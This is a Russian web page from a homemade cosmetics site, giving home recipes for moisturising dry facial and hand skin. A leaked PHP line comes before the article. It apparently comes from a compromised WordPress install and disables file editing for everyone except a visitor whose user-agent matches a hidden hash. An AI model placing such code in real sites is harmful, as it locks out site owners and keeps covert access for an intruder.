if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Хотите быть красивой? Узнайте все секреты увлажнения вашей кожи! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Хотите быть красивой? Узнайте все секреты увлажнения вашей кожи!

С наступлением долгожданной весны многие женщины начинают жаловаться на сухость кожи, которая появляется в результате весеннего недостатка витаминов и плохой погоды. Выход из этой ситуации довольно прост и не требует особых умений и затрат, и подойдет даже для «косметологов»-новичков.

С наступ­ле­ни­ем дол­го­ждан­ной вес­ны мно­гие жен­щи­ны начи­на­ют жало­вать­ся на сухость кожи, кото­рая появ­ля­ет­ся в резуль­та­те весен­не­го недо­стат­ка вита­ми­нов и пло­хой пого­ды. Выход из этой ситу­а­ции доволь­но прост и не тре­бу­ет осо­бых уме­ний и затрат, и подой­дет даже для «косметологов»-новичков. Это кос­ме­ти­ка в домаш­них усло­ви­ях для начи­на­ю­щих, в состав кото­рой вхо­дят кре­ма, скра­бы, мас­ки и ван­ноч­ки. Посред­ством увлаж­не­ния кожи с помо­щью неслож­ных про­це­дур мож­но лег­ко изба­вить­ся от сухой кожи все­го тела.

Увлажнение сухой кожи тела

devushka-voda-shatenka-poverxnost

Очень хоро­шо вос­ста­нав­ли­ва­ют вод­ный баланс кожи горя­чие ком­прес­сы и паро­вые ван­ноч­ки, кото­рые насы­ща­ют клет­ки кожи водой и кис­ло­ро­дом. Добавь­те в кипя­ток пару ложек липо­во­го цве­та и попарь­те кожу лица над целеб­ным паром 10–20 мин. Дай­те лицу пол­но­стью высох­нуть и нане­си­те пита­тель­ный крем. Толь­ко помни­те, что такие про­це­ду­ры име­ют ряд про­ти­во­по­ка­за­ний: гипер­то­ния, брон­хи­аль­ная аст­ма, рас­ши­ре­ние сосу­дов на лице.

Обез­во­жен­ную кожу в кос­ме­то­ло­гии сове­ту­ют умы­вать моло­ком и кипя­че­ной водой, взя­тых в оди­на­ко­вых пропорциях.

Вос­пол­нить недо­ста­ток живи­тель­ной вла­ги помо­гут сле­ду­ю­щие рецеп­ты домаш­них масок:

  1. 100 гр. меда, 80 гр. рас­ти­тель­но­го мас­ла и 2 желт­ка. Все ингре­ди­ен­ты рас­те­реть в каши­цу, подо­греть. На лицо нано­сить в несколь­ко захо­дов через 5–6 мин.
  2. Сме­шать по одной чай­ной лож­ке май­о­не­за, яблоч­но­го уксу­са, меда и касто­ро­во­го мас­ла. Нано­сить мас­ку на 7–20 минут.
  3. Соеди­нить сок 1 грейп­фру­та с 2 ч. лож­ка­ми меда. Мас­ка нано­сит­ся на 10 мин. И смы­ва­ет­ся под холод­ной про­точ­ной водой.ввв

Увлажнение кожи рук

Кос­ме­ти­ка в домаш­них усло­ви­ях помо­жет устра­нить сухость кожи рук. Вот неко­то­рые увлаж­ня­ю­щие рецеп­ты масок:

  1. Сде­лать настой из 0,5 ста­ка­на кипят­ка, лож­ки подо­рож­ни­ка и кален­ду­лы (цвет­ков), в отце­жен­ный настой доба­вить лож­ку меда и ст. лож­ку сли­воч­но­го масла.
  2. Раз­мять спе­лый банан до мяг­кой каши­цы, соеди­нить с 2 лож­ка­ми сли­вок и нане­сти на кожу рук на 10–15 мин.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!